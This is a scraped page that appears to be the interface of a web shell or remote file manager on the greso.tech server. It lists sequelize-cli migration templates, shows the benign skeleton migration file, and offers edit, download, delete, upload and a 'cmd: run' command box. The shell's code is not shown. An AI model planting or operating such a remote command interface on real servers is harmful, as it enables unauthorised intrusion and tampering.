/
var
/
www
/
greso.tech
/
server
/
nsm
/
node_modules
/
sequelize-cli
/
lib
/
assets
/
migrations
/
/var/www/greso.tech/server/nsm/node_modules/sequelize-cli/lib/assets/migrations
mkdir
upload
Name
Size
Mode
Actions
create-table.js
1006
0644
edit
dl
rm
skeleton.js
454
0644
edit
dl
rm
Edit:
/var/www/greso.tech/server/nsm/node_modules/sequelize-cli/lib/assets/migrations/skeleton.js
(454B)
'use strict'; /** @type {import('sequelize-cli').Migration} */ module.exports = { async up (queryInterface, Sequelize) { /** * Add altering commands here. * * Example: * await queryInterface.createTable('users', { id: Sequelize.INTEGER }); */ }, async down (queryInterface, Sequelize) { /** * Add reverting commands here. * * Example: * await queryInterface.dropTable('users'); */ } };
Save
cmd:
run